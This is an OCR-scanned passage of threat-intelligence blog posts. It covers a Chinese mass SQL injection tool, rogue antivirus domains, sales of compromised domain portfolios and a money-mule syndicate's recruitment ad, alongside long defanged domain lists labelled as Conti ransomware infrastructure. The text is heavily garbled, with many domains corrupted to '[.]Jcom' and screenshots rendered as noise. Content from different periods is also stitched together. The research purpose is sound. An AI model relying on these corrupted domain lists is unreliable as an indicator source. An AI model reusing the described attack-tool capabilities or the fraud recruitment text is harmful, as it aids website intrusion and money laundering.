blsby[.]Jcom 
bmkf999[.]Jcom 
bnyltea[.Jcom 
boccty[.]Jcom 
bokechengshiyouxidt[.]com 
bookmarkporno[.]com 
bootsstock[.]com 
boteweil.Jcom 
botingchina[.]Jcom 
bqsgol[.]Jcom 
bqz8[.]com 
brdcnc[.]Jcom 

19523 


brighIness[.]review 
btthiq[.Jcom 
bulkequ[.]Jcom 
bwgpearl[.]Jcom 
byOts[.]net 
bzxlyx[.]com 
c-buttons[.]Jcom 
c6mn-wfmyconfig[.]Jcom 
candabare[.]com 
cardd[.]top 
cbababy[.]com 
cbd-flower[.]com 
ccger[.]Jcom 
cchhff[.]net 
cd-stone[.]com 
cdayjt[.]Jcom 
cdfzsh[.]com 
cdinto[.]com 
cdlywj[.]com 
cdn[.]f5c[.]Jde 
cdpls[.]Jcom 
cdslh[.]com 
ce-dt[.]Jcom 
cefoc-austar[.]net 
cellzddl[.]Jcom 
censist[.]Jcom 
cgidea[.]net 
cgytsl[.]Jcom 
cha860[.]com 
chanitex-bj[.]Jcom 
chanta[.]Jcam 
chaodaojie[.]com 
chaoyangnanke[.]com 
chaseconfigusa[.]com 
chenguanggq[.]Jcom 
19524 


chensichengclub[.]com 
cherli[.]net 
chigogw[.]com 
china-hangkong[.]com 
china-hulanwang[.]com 
china-iwb[.]com 
china-lengku[.]com 
china-myfood[.]com 
china-newrun[.]com 
china-yongxiang[.]com 
china-yuer[.]com 
chinaaili[.]com 
chinabilliardsexpo[.]com 
chinacarriersforum[.]com 
chinacuttingmachine[.]com 
chinadgpx[.]com 
chinagongjing[.]Jcom 
chinahk-logistics[.]com 
chinanyzx[.]com 
chinaobey[.]com 
chinagq365[.]com 
chinasbk[.]Jcom 
chinaskyfly[.]Jcom 
chinataigu[.]Jcom 
chineselawyer-sh[.]com 
chnluhu[.]Jcom 
chnruil[.]Jcom 
chpshzx[.]com 
chufengedu[.]com 
chveh[.]com 
chwgqjyjd[.Jcom 
ciicqyj[.]com 
ciicshjphr[.]Jcom 
citiselect-6nm[.]com 
cits10000[.]Jcom 


19525 


cldao[.]com 
clientuswf-ac7m[.]com 
clientwfus-2anw[.]com 
clydeit[.]Jcom 
cmicl[.]Jcom 
cmpmarineproducts[.]com 
cn-pyzj[.Jcom 
cn-xudong[.]com 
cn3ddayin[.]Jcom 
cncome[.]net 
cnguangtail.]net 
cngulf[.]Jcom 
cnhuaian[.]net 
cnjinnuo[.]net 
cnmfcl[.Jcom 
cnsdim[.]com 
cogent-careers[.]com 
cokuke[.]com 
configwells-2yn[.]com 
configwells-2yn[.]com 
contestep[.]Jcom 
controlaxiety[.]com 
cosacg[.]com 
cqbyqc[.]Jcom 
cqdzsk[.]Jcom 
cqjxzl[.Jcom 
cqlfe[.Jcom 
cqmagic[.]Jcom 
cqrhjc[.Jcom 
cqshengmai[.Jcom 
cqspyj[.]Jcom 
cqwzmayal[.]com 
cshands[.]best 
cshxhy[.]com 
csjnhb168[.]com 
19526 


csufox[.]Jcom 
cswuliao[.]Jcom 
csyshow[.]com 
ctszgzjj[.]Jcom 
curcumin-chinal[.]com 
cxhome[.]net 
cxlp168[.]Jcom 
cxtongda[.]com 
cxyaodian[.]com 
cyhoo[.]net 
czalmc[.]com 
czxfdj[.Jcom 
czxinding[.]Jcom 
czxingda[.]net 
dadi-gd[.]Jcom 
danyang6[.]com 
dagohj[.]Jcom 
datacloudhub[.]net 
datangzhiyao[.]Jcom 
datum-jebsen[.]com 
dayujin[.]Jcom 
dc5yourmaill.]gq 
dcysd[.]Jcom 
ddhit[.]Jcom 
decoregold[.]com 
deepcool-de[.]Jcom 
dengopack[.]com 
dermynnvren[.]Jcom 
developer[.]space 
devild[.Jcom 
dfoucc[.]Jcom 
dg-tape[.]Jcom 
dg18sn[.]Jcom 
dgg365[.]Jcom 
dghog[.]com 


19527 


dghxjs[.]Jcom 
dgmeile[.]com 
dgrkshye[.]com 
dgssls[.]Jcom 
dgwuliu888[.]com 
dgyanchu[.]com 
dgyscm[.]Jcom 
dgzhuogiang[.]com 
dgzl88[.]Jcom 
dhgj108[.]com 
dianpian188[.]com 
diantika[.]com 
diwanhs[.]com 
diydiannao[.]com 
diyijiazhuang[.]com 
djdz89[.]Jcom 
djytgw[.]com 
dkt88[.]Jcom 
dljiewu[.]Jcom 
dlpf120[.]com 
doedoe[.]best 
domixi[.]Jcom 
dongdongfushil[.]com 
dontpanicarts[.]com 
dreamnestcrew[.]com 
dreamsonline[.]net 
dszhi[.]Jcom 
dtdlgs[.]Jcom 
dtnovell.Jcom 
dubogu[.]com 
dulight[.]net 
duoduojiayi[.]net 
duolianhb[.]com 
duwanjuan[.]net 
dw1002[.]com 
19528 


dybetqt[.]Jcom 
dys-edu[.Jcom 
dzhon88g[.]com 
dzhxsk[.]com 
dzjiatong[.]Jcom 
dzmyyz[.]Jcom 
dzq66[.]com 
e-medservices[.]net 
ea-led[.]com 
easierthanreading[.]Jcom 
easyworm|[.]com 
ebellking[.]Jcom 
echina56[.]com 
edppr[.]Jcom 
eduaskjd[.]Jcom 
egorkamud[.]com[.]ru 
eknoware[.]com 
electronics-on-sell[.]com 
enet05[.]Jcom 
enigma-haq[.]net 
esongballmill[.]Jcom 
etcdy[.]Jcom 
everestemb[.]com 
ex1980[.]com 
f5zd[.]com 
fag-zc[.]Jcom 
famouspornstarmovies[.]com 
fanmdis[.]Jcom 
fargoselc-6us[.]Jcom 
fayunfzc[.]Jcom 
fcche[.]net 
feishide777[.]com 
fetzs[.]Jcom 
ff0432[.]Jcom 
ffhssy[.]Jcom 


19529 


ffuser[.]Jcom 
fitovers-shop[.]com 
fimy2008[.]com 
fiyuebing[.]Jcom 
fkO23[.]Jcom 
flashmn[.]com 
flduoduo[.Jcom 
fluxyxbot[.]tk 
flyeen[.]com 
focus-vdp[.]com 
focusmedia-la[.]Jcom 
fongyuen[.]com 
founda[.]net 
fp7ireland[.]com 
francebacchus[.]com 
fsbef[.]Jcom 
fsgsyy[.]Jcom 
fushe886[.]com 
fuyunniao[.]Jcom 
fxfhhly[.]Jcom 
fygsbj[.]Jcom 
fyxt99[.]Jcom 
fzfcsk[.]Jcom 
fzlwq[.]Jcom 
fzplic[.]Jcom 
g-stranslation[.]Jcom 
g654shicail[.]Jcom 
gallsforpleasure[.]Jcom 
gangban-cn[.]com 
gaosanle[.]com 
gaoxiuxia[.]com 
gdcsgame[.]com 
gdjibing[.]Jcom 
gdsnit[.]Jcom 
genelalor[.]Jcom 
19530 


generation-digitall[.]net 
genericcialisfast[.]com 
gfl120[.]Jcom 
ggthsjz[.]Jcom 
ghwell[.]Jcom 
gjlyw[.Jnet 
gjxngay[.]Jcom 
gl-valves[.]Jcom 
globall-security[.]Jcom 
gmsdyal[.]Jcom 
gmxiehe[.]Jcom 
golden-creative[.]com 
goldfb[.]Jcom 
gongnuw2[.]com 
goodcrm[. ]net 
gotubu[.]Jcom 


gpsone110[.]com 


greatcoupons-online[.]Jcom 


gruminoger{[.]ru 


gsy520[.]com 


guanyinhometown|[.]com 


gubaow[.]com 
gudongsh[.]com 
guizhipin-tech[.]Jcom 
guocui99[.]Jcom 
guowenedu[.]com 
gushento[.]com 
guyjsu[.]club 
gwpaimail.Jcom 
gxdnhs[.]com 
gxhai[.]Jcom 
gxlai[.Jcom 
gxoperabrowser[.]com 
gxtq99[.]Jcom 


gyjxzz[.]Jcom 


19531 


gykzb[.]Jcom 
gymnclass[.]Jcom 
gypfbyy[.Jcom 
gyydjx[.]Jcom 
gzbaiyang[.]com 
gzcba[.]Jcom 
gzfapiao08[.]com 
gzjrjy[.Jcom 
gzleather[.]net 
gzlqzx[.]Jcom 
gzqjhygk[.]com 
gzqt123[.]Jcom 
gzwxtx[.]Jcom 
gzxuejia[.]Jcom 
gzyouleyou[.]Jcom 
gzyuansu[.]com 
haccpcn[.]Jcom 
haier-broadtech[.]com 
haitjy[.]Jcom 
hanhehj[.]Jcom 
haojii[.]Jcom 
haoshui123[.]com 
haoxianlan[.]Jcom 
hasbur[.Jcom 
hb-jtian[.Jcom 
hbbohaigroup[.]Jcom 
hbbzd[.]Jcom 
hbfhdb[.]com 
hbsthtc[.]Jcom 
hbtrpr[.Jcom 
hcmfqy[.]Jcom 
hcvdp[.]com 
hdgjlw[.]Jcom 
hdlqqg[.]com 
hdrsqwx[.]com 
19532 


4.10.20 Massive SQL Injection Attacks - the Chinese Way (2008-10-21 23:01) 


=—==_—_ PYORARALL/|\A 


Wuban Furuki secanty group is keen on 6 number of computer network secunty technology, is comanitted to the 
maintenance of iMemal secunty, Web server component of young people in order to secure technology-based 
professional and technical services team. The core team members have many years of the core systems, network 
applications, Web applications, hacking tools, network secunity theory, theory of the varus, dete encryption and 
decryption, hacking and many other ways to have an in-depth research ard experience. After years of constant 
exploration and unremitting efforts, sccumulated nich experience in the development of network security and 
improve network security solutions, home network to take this to beast safety modest! 


In recent years, the national security of the Internet encountered umprecedented challenges, “hackers” are full of all 
types of media, a website datebase of the game have been caused by the irvasion rearly 1,000,000 US. dollars of 
economic losses, a hacker to visit a company to use the datsbase server to steal 1,400,000 Customer credit card and 
debt card information and so on. At the same time, based on the rogue software on the Internet, software and 
various types of Trojan horse virus has also spread to the security of the Internet has brought serious harm. Baidu 
from the type of “hackers” search, 18,500,000 of the current data show that the proliferation of hacking, but also 
indicates our awareness of network security from the buikiing to have e serious shortage, as our hfe for a growing 
Geperdence on the Internet The higher, cell phones, e-zail, Internet banking and so on, just do rot pay attention 
will be subjected to heavy financial losses. Network security incidents occur frequently proved that the 
information network fox the defezee to be taken senously, precisely because of the importance of the Internet, but 
also due to tts vulnersbility, so we will provide an Imermet-based network security services platforms for 
enterprises And personal resolve to worry about. 


From [1]copycats and [2]"localizers" of Russian web malware exploitation kits, to suppliers of 
original hacking tools, the Chinese IT underground has been closely following the emerging 
threats and the obvious insecurities on a large scale, and so is either filling the niches left 
open by other international communities, or coming up with tools setting new benchmarks for 
massive SQL injection attacks, like the case with this one : 
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"A professional web site vulnerability scanning, use of tools, SQL injection is a new generation 
of tools to help Web developers and site of the station quickly find vulnerabilities in order to 
be able to effectively prepare Security work. At the same time, the tool to Web developers 
to demonstrate the ways in which hackers are using these vulnerabilities, hackers, as well 
as through the loopholes to do things, can effectively raise the safety awareness of relevant 
personnel." 
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Nothing’s wrong with the marketing pitch at the first place, but going through the features, 
the "massive SQL injections through search engine reconnaissance" and automatic page 
rank verification which you can see in the attached screenshots, ruin the "security auditing" 
marketing pitch. The tool not only allows easy integration of potentially vulnerable sites 
obtained through [3]search engines reconnaissance, but also, is prioritizing the results based 
on the probability for successful injection, next to the page rank of the domains in question. A 
simple demonstration offered by the company is also, directly enticing its users to "localize" 
the search engine reconnaissance, by filtering the search results for a particupar country, 
in this case they used French sites for one of the demos. Here are some excerpts from its 
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Related responding domains known to have participated in Conti ransomware gang’s C &C 
(Command and Control) and Internet connected infrastructure include: 
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024tz[.]Jcom 
027asd[.]com 
027bangbang[.]Jcom 
029gaoke[.]com 
O29yt[.Jcom 
0372dh[.]Jcom 
037h[.]Jcom 
0411cp[.Jcom 
0411phone[.]com 
0451lapple[.Jcom 
0455rencail.Jcom 
0512cad[.]Jcom 
0546v[.]Jcom 
0551gz[.]Jcom 
0571bp[.]Jcom 
0571tc[.]Jcom 
0592mobile[.Jcom 
0595ee[.]Jcom 
O6fanli[.Jcom 
0755google[.]Jcom 
0769baofeil.Jcom 
0769sdl[.]Jcom 
091218[.]Jcom 
Oxxs[.]Jcom 
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10000jx[.]Jcom 
100dI[.]net 
1010jk[.Jcom 
107zjj[.Jcom 
120hiv[.Jcom 
120hnnk[.Jcom 
120male[.Jcom 
120q[.]net 
12580cf[.Jcom 
126nb[.]Jcom 
135208[.]com 


13768848137[.]Jcom 


15jzh[.]Jcom 
163gck[.]net 
166681[.]com 
1688gzf[.]Jcom 
168cut[.]Jcom 
168lock[.]com 
170452[.]Jcom 


17beyond[.]Jcom 


17gwt[.]Jcom 
17v71[.]Jcom 
188huar[.]Jcom 
1shang[.]net 


2008-08-08[.]Jcom 
2012njanmo[.Jcom 


24designerreplica[.]Jcom 


2tys[.]Jcom 
2vpn[.]net 
312mmwl[.]com 
3181302[.]com 
31bbc[.Jcom 


31mtv[.]Jcom 


321-buxiugangw[.]com 


35jk[.]net 
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360efang[.]Jcom 
366o0n[.]Jcom 
371886[.]Jcom 
373hx[.]Jcom 
39gk[.]net 
3wfdpt-prime[.]Jcom 
4008110518[.]Jcom 
400tele[.]net 
40lu[.]Jcom 
A3neiyi[.]Jcom 
458rxk[.]com 
4bag4[.]com 
4wcc[.]net 
4wellsprime[.Jcom 
4wxellsfmanagement[.]com 
51-www[.]com 
516itravel[.]com 
518idc[.]net 
518lunwennet[.]com 
51chongdiangi[.]Jcom 
51dzpk[.]Jcom 
51hulan[.]Jcom 
51jzjc[.]Jcom 
51mpmm[.]com 
51pinche[.]net 
51qdf[.Jcom 
51twp[.]Jcom 
5lyoumo[.]Jcom 
51zhenggian[.]net 
520chengpin[.]com 
520zhika[.]Jcom 
52education[.Jcom 
52lufei[.]Jcom 
52qcbl[.]com 
52qiandeng[.]com 
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537fck[.]Jcom 
54tj[.]Jnet 
55fansheng[.]com 
56nd[.]com 
56zhang[.]Jcom 
577rx[.]com 
580hoetl[.]com 
58touch[.]Jcom 
591deal[.Jcom 
5962580[.]com 
596js[.]Jcom 
5bac[.]Jcom 
5i43[.]net 
5ifanl[.]Jcom 
5izfy[.]Jcom 
5xs5[.]com 
61bxg[.Jcom 
635e[.]com 
649ff[.]Jcom 
66shenyang[.]com 
6eur[.]Jcom 
6icc[.]Jcom 
6zon[.]com 
6zyy[.]Jcom 
71koub[.]com 
7297kennel[.Jcom 
7d60[.Jcom 
7nanke[.]com 
80080012580[.]com 
81jz[.]net 
82255633[.]com 
82fuke[.]Jcom 
82tt[.]net 
8484t[.]Jcom 
86eshop[.]com 
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9-here[.]Jcom 
90guangjie[.]com 
911gm[.Jcom 
915866[.]Jcom 
91mucai[.]Jcom 
91qubanshuang[.]Jcom 
920nt[.]Jcom 
941aimeil.]Jcom 
942go[.]Jcom 
94ywog[.]com 
958tuan[.]com 
95sico[.]Jcom 
988w[.]net 
9959shop[.]Jcom 
999bzw[.]com 
99jcshop[.]Jcom 
9dxt[.]Jcom 
9teentube[.]com 
a400plc[.]Jcom 
a8dlrrl88[.]Jcom 
aaccnn[.]com 
aadinex[.]com 
abbieswine[.]Jcom 
abbsh[.]com 
acceha[.]net 
acheshil.Jcom 
aeppt[.Jcom 
afpkaoshi[.]com 
aftym[.]Jcom 
aguijianshen[.]Jcom 
ahbaijiu[.]com 
ahsheying[.]com 
ahwyzs[.]Jcom 
aidesen[.]net 
aisaintop[.]Jcom 
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- New powerful "automatic machine cycle" feature 


- Automatic machine cycle is to provide assistance to the advanced user manual into the use 
of a very 


- powerful and flexible module, the main sites used for some special filtering into the hand, is 
almost a 


- universal tool, you can achieve the following: 
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aitaoyz[.]Jcom 
aivntech[.]com 
aixiaodu[.]Jcom 
aiyousq[.]Jcom 
ajufy[.]Jcom 
alanah-rae[.]net 
allaviationsites[.]Jcom 
alonelysky[.]com 
amhsy[.]com 
amoyhu[.]com 
angelfull[.]com 
anqinghotel[.]Jcom 
aodong18hao[.]com 
aolaixin[.]Jcom 
apple-blue[.]Jcom 
appnail[.]Jcom 
aptssw[.]com 
arcadephase[.]com 
asoexample[.]site 
ason-corp[.]com 
attoless[.]net 
audiosos[.]net 
augame8g4[.]com 
avaaddamslove[.]com 
avon189[.]com 
aysysm[.]Jcom 
azjyw[.]Jcom 
baanhanibah[.]com 
bai0532dul[.]Jcom 
baibanleave[.]Jcom 
baidianfeng10[.]Jcom 
baidujl[.Jcom 
baienled[.]com 
baiquanw[.]Jcom 


bairuiwenhua[.]Jcom 
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baisha-port[.]Jcom 
baixingjx[.]com 
bandilier[.Jcom 
banghuisz[.]com 
baotaihk[.]Jcom 
baotest[.]Jcom 
bcbmxz[.]com 
bcdedit[.]Jcom 
bcypet[.Jcom 
bdhly114[.Jcom 
bdnpxzl[.Jcom 
bdqingling[.]Jcom 
beidouchip[.]com 
best001[.]net 
bestaiongold[.]Jcom 
bestseu[.]Jcom 
bimbolinks[.]Jcom 
bingdianfeidian[.]com 
biospacechina[.]Jcom 
bizhency[.]com 
bj-hengxin[.]Jcom 
bj-tj[.]Jcom 
bj51888[.]com 
bjbaojiewang[.]Jcom 
bjchix[.]Jcom 
bjdiaosu[.]net 
bjdxdg[.]Jcom 
bjdyxh[.]Jcom 
bjjzks[.]Jcom 
bjk321[.]Jcom 
bjkaicheng[.]com 
bjlbbb[.Jcom 
bjlbjy[.Jcom 
bjlncyy[.]Jcom 
bjpw888[.]com 
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bjrqgs[.Jcom 
bjsxgj[.]Jcom 
bjwxjjc[.]Jcom 
bjxlwy[.]com 
bjxsdh[.]com 
bjxyzjh15910865176[.]com 
bjyrmd[.]com 
bjyuhe[.]Jcom 
bjzxhb[.]Jcom 
bjzzhi[.]com 
blazeroulette[.]com 
blogcoward[.]com 
blsby[.]Jcom 
bmdzg[.]com 
bmkf999[.]Jcom 
bnyltea[.Jcom 
boccty[.]Jcom 
bodanpx[.]Jcom 
bohong365[.]com 
bokechengshiyouxidt[.]com 
bookmarkporno[.]com 
bootsstock[.]com 
boteweil.]Jcom 
botingchina[.]com 
bowenguanl1[.]com 
bqsgol[.]Jcom 
bqz8[.]Jcom 
brdcnc[.]Jcom 
brilliantjm[.]com 
btthlg[.Jcom 
bulagu[.]Jcom 
bulkequ[.]com 
bunnygrenade[.]com 
buyimvu[.]Jcom 


buyviagraonlinemd[.]com 
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bwgpearl[.]Jcom 
bxjy365[.]Jcom 
byplw[.]com 
byqmm[.]com 
bzxlyx[.]com 
c-buttons[.]Jcom 
c6mn-wfmyconfig[.]Jcom 
caimeiprinting[.]com 
camiloholguin[.]com 
caogenzazhi[.]Jcom 
caogenzhiku[.]com 
cbababy[.]com 
cbd-flower[.]com 
ccdzj[.]Jcom 
ccger[.]Jcom 
cchhff[.]net 
cd-stone[.]Jcom 
cdayjt[.]Jcom 
cdeals4us[.]com 
cdeals6us[.]com 
cdfzsh[.]com 
cdguiqulai[.]Jcom 
cdinto[.]com 
cdlywj[.]com 
cdmandarin[.]com 
cdpls[.]Jcom 
cdslh[.]Jcom 
cdxsdzg[.]net 
ce-dt[.]Jcom 
cefoc-austar[.]net 
cellzddl[.]Jcom 
censist[.]Jcom 
cf512[.]com 
cgidea[.]net 
cgytsl[.]Jcom 
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1. In support of GET / POST / COOKIES in a variety of ways, such as the injection. 

2. Scan the key to the page (background, upload, WebShell, databases, backup files, etc.). 

3. According to the dictionary to violence landing back-guess solution WebShell password and 
password (required to verify that the code can not guess solution). 


4, Page language does not limit the types and databases (to provide specific statements into 
the database). 


5. At the same time, support for the circulation of the two variables and two dictionaries, fast 
running and violent content of the database solution to guess a password." 


It gets even more interesting in terms of the massive SQL injection attacks mentality 
which is pretty evident on all fronts : 
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- The use of the three search engine sites scans to invade the side to complete 
- in scanning probe into the Web site ranking points 
- added, "VBS upload to download", "upload directory Web site viewer," "FTP upload to 


download configuration file" function to make it more convenient for the sa rights to use the 
site. 


- New "sequence document scanners" 

- What is the sequence document scanners role? Upload to find loopholes, some of the 
procedures to upload the file after the upload will be renamed, rename the way the system 
is usually based on time or incremental increase in the number prefix code for the upload 


process, if not to return after the file name, Upload files to know the url is usually very difficult 
to sequence the use of paper scanner can be scanned out 
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- The best reverse domain name query engine, and quasi-wide 

- in scanning the database of basic information, an increase of the database of information 
related to the process, the link has information on the database server user login (sa need 
permission) 

- control of the interface had a big adjustment, the interface process easier to understand and 
operate. 

- based on a significant site of the wrong mode of access to a comprehensive code optimization 
and more accurate access to the content, accuracy and access to show progress. 

- added, "VBS upload to download", “upload directory Web site viewer," "FTP upload to 
download configuration file" function to make it more convenient for the sa rights to use the 
site. 
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- point into the types of improved detection order to improve the efficiency of detection. 

- improved automatic keyword detection, automatic keyword detection more accurate. 

- probe into the points the way to improve and increase the use of automatic detection of the 
keyword detection. 

- type of database to improve the detection, the use of the contents of the length of the failure 
to detect the type of database automatically switch to the probe through the keyword. 

- automatically save and load solution has been to guess the tree structure of the database, 
guess Solutions has been the content and structure of the database will automatically save 
and open the next time the injection point will be automatically made available, the solutions 
do not have to guess again, the continuity of work Greatly increased. 
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- solved from the database to read large amounts of data (on hundreds of thousands or 
millions of records), the half-way card program will die. 

- increased significantly on the wrong model of ASP.NET and SQL Server2005 significant mode 
of dealing with mistakes, error messages can be extracted from a Web directory! 

- significant amendments to the wrong mode, some of the injected one by one point in the 
field or access to the contents of the issue can not be successful (error code in hand); for 
increased access to specific points table and into the field. 


- amendments to the text of a significant error patterns to detect and correct use of 
loopholes in the system can be used more to expand. (Text significantly in the wrong mode in 
version 1.1 already supported, but in the version 1.2 upgrade in the process of scanning to 
improve the performance of the Gaodiao careless. - _- #) 

- on a variety of encoded text can be significantly wrong in the right-compatible, able to 
correctly handle the ASP.NET page of the text marked wrong. Through custom error keyword, 
truly compatible with any language, any coding error message. 

- crack anti-improvement and enhancement. 

- An increase of auto-detection feature keywords. 


- Mssql database specifically for significant points into the wrong mode of detection and 
the use of up and down the hard work, and many other software can not detect the point of 
injection can also be used. 

- Automatic save and load access to the database, to allow manual known to add tables and 
fields for solutions to guess. 

- Can be used to amend the degree of accuracy; optimize the code to reduce memory footprint; 
enhance the stability of multi-threading. 
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- Significant amendments to the wrong mode solution guess the contents of the database 
must be checked first field defects." 


The public version of the tool has been in the while for over an year, with a VIP version 
available to customers only. 


1. http: //ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 
2. http: //ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 
3. http: //ddanchev. blogspot .com/2007/07/sql- injection-through-search-engines .htm 
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Popping up like mushrooms, these are the very latest rogue security software domains for your 
case building, cross-checking, or blackholing pleasure. Interestingly, next to decentralizing the 
hosting locations, they’re also using legitimate hosting providers, whose reputation they’ve 
also been [1]abusing for spamming in the past : 
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How can Smart Antivirus 2009 help you? 


‘Sean Antvarss 2000 4 the Naghest level of protecton against Ihe Breats of 
VTUSeS and spyware Rhas been designed to keep your PC secure Smart 
Aptranes 2009 guarartess Te heghest Mevel of protecbon for your systen? 


Viruses and mamccous programs inevitably ead to system Meares crashes 
296 £3 SlowG7wns Smart Ar@urus 2009 technology Safeguards you from a8 
Bread) OWN ANd New viTUseS and Mmakicious programs & ofers tote real 
bene protecton for your PC 

Use Smart Antverus 2009 9 opemmice and repair your PC 


Try Smart Antivirus 2009 now! 


go-scan-pro .com (78.157.143.184) 
internet-antivirus-2008 .com 
ia-stat-ia .com 

ia-scanner-pc .com 
ia-scanner-pro .com 
goscanpc .com 

go-iascan .com 

ia-install-pro .com 
ia-scan-pro .com 
ia-scanner-pro .com 
ia-scanpro .com 
ia-scannerpro .com 
ia-free-scanner .com 
ia-scan-now .com 
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System Tasks a Local Oise (C:) 4 Local Oise (0:) 


Fa] View system information 


Add or remove programs ) ~, 
Change a settings ga 2. Dvo-RameF:) —— Shared Documents 
Places System errors detected. To prevent data lost system scanning is started 
©) My Network Places Scanning... [i 
&) My Documents Object: ——_C:\WINDOWS\system32\ativvancc.dl 


() Shared Documerks 
GB Control Panel 


Details The page at http://ia-scanner-pro.com says: 

My Computer Windows is scanning your system for threats. The scanning is provided by our official partner 
System Folder Internet Antivirus. 

Please refrain from closing the window until the scanning is finished. 


We highiy recomenend you to install the full version of Internet Antivirus scanmer to monor your PC 
for threats and on-time security system updates. 


Cx) 


online-antivirus .net (91.203.70.57) 
virus-scan-online .com 
online-virus-scanning .com 
scanner-protection .com 
online-scan .net 


s-avirus2009 .com (92.241.177.70) 
sa-vir2009-buy .com 
s-avir2009-buy .com 


xpas-2009 .com (96.9.135.85; 206.161.120.26) 
xp-as-2009 .com 


antimalwaresuite2009 .com (58.65.234.193) 
cleaner2009pro .com 


pcdefender2008 .com (89.149.241.228) 
database-virus .com (75.125.215.35) 
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» 


Systemaufgaben = Lokaler Datentrager (C:) —) Lokaler Datentriger (D:) 


[¥) Systeminformatonen te Hardware-Fehler 


anzeigen — 
a Sormere a f)) _ OVD-RAM-Laufwerk (F:) r Gemeinsame Dokumente 
G Bine Ginstellung andern , @ Sicherheitsgefahr 
an Systemfehler gefunden. Um die Date nicht zu loesen wird das System gescannt 
Andere Orte “ 
: Scannen.. |SHHHHREREHRREEES | | Cancel 
© Netzwerkumgebung Objekt: ——_C:\WINDOWS\Temp\jassam.dl 
&} Sgene Dateien 
©} Gemeinsame Dokumente x) Hardware- und Sicherheitsfehler gefunden 


Systemsteverung 
> Systemsteverung Hardware-Fehler 


Arbeitsleistung Ihres PC ist niedrig wegen Dateisystemfehler. Das folgte mach 

Veraenderungen, die mit Mabware in Ihren Systemdateien gemacht waren, und 
Details x Spyware benutzt viele offene Ports um Iher persoeniiche Daten ueberzutragen. Ihre 

persoeniiche Daten sind unter Gefahr. 

Spyware hat Ihre persoeniichen Informationen gestohien. 

Sie koennen den Inhalt der gestohlenen Informationen unten sehen: 

Steat: Germany 


Stadt: Berlin 
IP-Adresse: Remove all 


Moreover, a new template which you can see in the attached screenshots that mimicking a 
local AV scanning, has been circulating for a while. Naturally, it’s localized and based on the 
browser’s default language is serving a local version of the message. Follow the customer 
and expose the vendor still works, however, in between the average time it takes to track 
them down, a great number of people have already purchased the rogue software. The rogue 
security software business model is very similar to the spamming business model in the sense 
that they don’t care whether 5, 10 or 15 people get tricked and install it, since even if 4 people 
out of the 100,000 unique daily visits fall victim - they break even. 


Related posts: 
[2]A Diverse Portfolio of Fake Security Software - Part Nine 


[3]A Diverse Portfolio of Fake Security Software - Part Eight 
[4]A Diverse Portfolio of Fake Security Software - Part Seven 
[5]A Diverse Portfolio of Fake Security Software - Part Six 
[6]A Diverse Portfolio of Fake Security Software - Part Five 
[7]A Diverse Portfolio of Fake Security Software - Part Four 
[8]A Diverse Portfolio of Fake Security Software - Part Three 
[9]A Diverse Portfolio of Fake Security Software - Part Two 
[10]Diverse Portfolio of Fake Security Software 
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4.10.22 Compromised Portfolios of Legitimate Domains for Sale (2008-10-24 15:22) 
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Is the demand for access to [2]compromised legitimate portfolios of domains - where the 
price is based on the pagerank and is shaped by the number of domains in question - the 
main growth factor for the increasing supply of such stolen accounting data, or is it the result 
of cybercriminals data mining their botnets for accounting data that would provide them with 
access to such [3]portfolios of high trafficked domains with clean reputation? Moreover, would 
such a data mining approach made easily possible due to the availability of botnet parsing 
services and stolen accounting data dumps streaming directly from a botnet, would in fact be 
the more efficient approach in injecting their malicious presence on as many hosts as possible, 
next to the plain simple [4]massive SQL injection approach? 


As always, it’s a matter of who you're dealing with, and their understanding of the ex- 
clusiveness of a particular underground item at a given period of time. This exclusiveness is 
inevitably going to increase due to the fact that they’re several "vendors" that are already 
purchasing access to such portfolios, as well as compromised Cpanel accounts as a core 
business, the access to which they would later on either resell at a higher price enjoying the 
underground market’s lack of transparency, or directly monetize and break-even immedi- 
atelly. As for this particular proposition for an account with 404 domains in it, it’s interesting 
to monitor how the seller is soliciting bids from multiple sources by leaving the price an 
open topic, clearly indicating his low profile into the underground ecosystem. How come? An 
experienced seller or buyer would be offering or requesting page rank verification respectively. 


With nearly each and every aspect of cybercrime already available as a service, or liter- 
ally outsourced as a process to those supposidely excelling into a particular practice, building 
capabilities for data mining botnets is no longer a requirement, with the people behind the 


1969 


botnets monetizing all the data coming from it by soliciting deals of accounting data dumps 
based on a particular country only. 


1. http://1.bp.blogspot .com/_wICHhTiQmrA/SQHOMySS3JI/AAAAAAAACWQ/Hs8QGER1160/s1600-h/compromised_web_hosting 
Bc: ancy ogi ol 2008 eugene ecouaee Tanai 
3, http: / /adancnev.blogspetcon/2006/09/adult-networkof-1448-donains tal 


4. http: //ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 


4.10.23 Money Mules Syndicate Actively Recruiting Since 2002 (2008-10-28 13:06) 
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Money mules have already been an inseparable part of the underground ecosystem. And 
while others try to hide their activities by [1]outsourcing their hosting needs to botnet masters 
partitioning their botnets, the experienced ones apply a decent level of OPSEC (operational 
security) by establishing a trust based model based on recommendations in order to even 
consider letting you register for their services. Their geographical location not only reflects 
the average time it would take to take action against their activities and expose yet another 
extensive network of fraudulent operations, but also, has the potential to increase or decrease 
the commissions that the mules take based on the risk factor of getting caught. 


There are several different types of money mules, those serving themselves, and those 
offering their services to others, in this particular case, we have a money mules syndicate 
that’s been operating since 2002, and is only serving the high profile customers. What hap- 
pens when such a money mule syndicate (naturally) starts vertically integrating by offering 
value-added services like credit card balance checking and date of birth lookups? Profits 
apparently increase, since the syndicate is actively recruiting and is currently looking for 20 
to 30 mules - their current staff is said to be approximately 100 people - to cash out anything 
from bank account logins, Paypal accounts, to stolen credit card data. Here’s a translated 
description of the service : 


"Who we are? 


- First place at (cyber crime community) top list of trusted service providers for 2008 
- We serve the big guys only since 2002 

- We never scam, in business since 2002 without a single scam complaint 

- We look for you, you don’t look for us 

- We offer outstanding working conditions and high commissions 


Who you should be? 

- Dedicated person with experience in the field 

- Have been in the business for at least 6 months 

- Have been recommended by at least 1 person from (cybercrime community) and from 
(cybercrime community) 

- You take 45 % commission of the processed check, minimal amount is $3000 

- You pay a membership fee 


1970 


In the next two months we draw the command of 20-30 people who will most satisfy 
our requirements. For the selected team will be Paradise conditions: 


- Instant payment (a few hours after delivered) 

- Large numbers to drop service in the USA and the UK (30) 
- Individual drop in the number of large islands 

- 3-5 fresh weekly drop 

- Round-the-clock support" 


In case some of their customers get scammed - appreciate the irony here as scammers 
compensate the scammers getting scammed by the scammer’s outsourced personnel - by 
some of their money mules, the service is offering compensation for the stolen goods/amount 
